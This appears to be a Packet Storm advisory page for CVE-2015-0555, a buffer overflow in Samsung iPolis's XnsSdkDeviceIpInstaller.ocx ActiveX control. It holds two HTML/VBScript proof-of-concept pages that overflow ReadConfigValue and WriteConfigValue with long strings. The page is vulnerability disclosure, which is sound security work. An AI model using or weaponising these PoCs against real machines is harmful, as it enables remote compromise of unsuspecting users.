Lucene search
Praveen DarshanamPACKETSTORM:130478HistoryFeb 21, 2015 - 12:00 a.m.
Samsung iPolis Buffer Overflow
2015-02-2100:00:00
Praveen Darshanam
packetstormsecurity.com
16
0.134 Low
EPSS
Percentile
95.6%
`CVE-2015-0555
Introduction
*************************************************************
There is a Buffer Overflow Vulnerability which leads to Remote Code
Execution.
Vulnerability is due to input validation to the API ReadConfigValue and
WriteConfigValue API's in XnsSdkDeviceIpInstaller.ocx
This is different from CVE-2014-3911 as the version of iPolis 1.12.2
(latest as of 12/12/2014).
CVE-2014-3911 is related to different ActiveX and on older iPolis version
Discovery MEthod: Fuzzing
Exploiting: It is a client side attack where attacker can host a crafted
HTML web page with malicious payload and entice the victim to browse to the
hosted page to compromise the victim.
Operating System: Windows 7 Ultimate N SP1
*************************************************************
Vulnerability1:
*Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_ReadConfigValue_RemoteCodeExecution*
******************Proof of Concept (PoC)**************8
</html>
<head> Samsung iPolis 1.12.x XnsSdkDeviceIpInstaller.ocx ReadConfigValue()
Remote Code Execution</head>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\Samsung\iPOLiS Device
Manager\XnsSdkDeviceIpInstaller.ocx"
prototype = "Function ReadConfigValue ( ByVal szKey As String ) As String"
memberName = "ReadConfigValue"
progid = "XNSSDKDEVICELib.XnsSdkDevice"
argCount = 1
arg1=String(1044, "A")
target.ReadConfigValue arg1
</script>
</html>
*****************************************************************************************
*Vulnerability2: *
*Samsung_iPolis1.12.2_XnsSdkDeviceIpInstaller.ocx_ActiveX_WriteConfigValue_RemoteCodeExecution
*
*******************Proof of Concept (PoC)*********************
<html>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\Samsung\iPOLiS Device
Manager\XnsSdkDeviceIpInstaller.ocx"
prototype = "Function WriteConfigValue ( ByVal szKey As String , ByVal
szValue As String ) As Long"
memberName = "WriteConfigValue"
progid = "XNSSDKDEVICELib.XnsSdkDevice"
argCount = 2
arg1=String(14356, "A")
arg2="defaultV"
target.WriteConfigValue arg1 ,arg2
</script></job></package>
</html>
****************************************************************************
CERT contacted Samsung but there wasn't any response from Samsung.
Refer http://blog.disects.com for more details
Best Regards,
Praveen Darshanam
`
Related
nvd
nvd
CVE-2014-3911
2014-06-11 14:55:09
CVE-2015-0555
2015-02-24 15:59:04
zdi
zdi
Samsung iPOLiS Device Manager XNSSDKWINDOW.XnsSdkWindowCtrlForIpInstaller.1 Start Method Remote Code Execution Vulnerability
2014-06-04 00:00:00
prion
prion
Design/Logic Flaw
2014-06-11 14:55:00
Buffer overflow
2015-02-24 15:59:00
cvelist
cvelist
CVE-2014-3911
2014-06-11 14:00:00
CVE-2015-0555
2015-02-24 15:00:00
cve
cve
CVE-2014-3911
2014-06-11 14:55:09
CVE-2015-0555
2015-02-24 15:59:04
exploitpack
exploitpack
saint
saint
Samsung iPOLiS Device Manager ReadConfigValue vulnerability
2015-04-27 00:00:00
Samsung iPOLiS Device Manager ReadConfigValue vulnerability
2015-04-27 00:00:00
Samsung iPOLiS Device Manager ReadConfigValue vulnerability
2015-04-27 00:00:00
checkpoint_advisories
checkpoint_advisories
packetstorm
packetstorm
Samsung iPOLiS 1.12.2 ReadConfigValue Remote Code Execution
2015-04-15 00:00:00
zdt
zdt
openvas
openvas
Samsung iPOLiS Device Manager Buffer Overflow Vulnerability
2015-03-20 00:00:00
exploitdb
exploitdb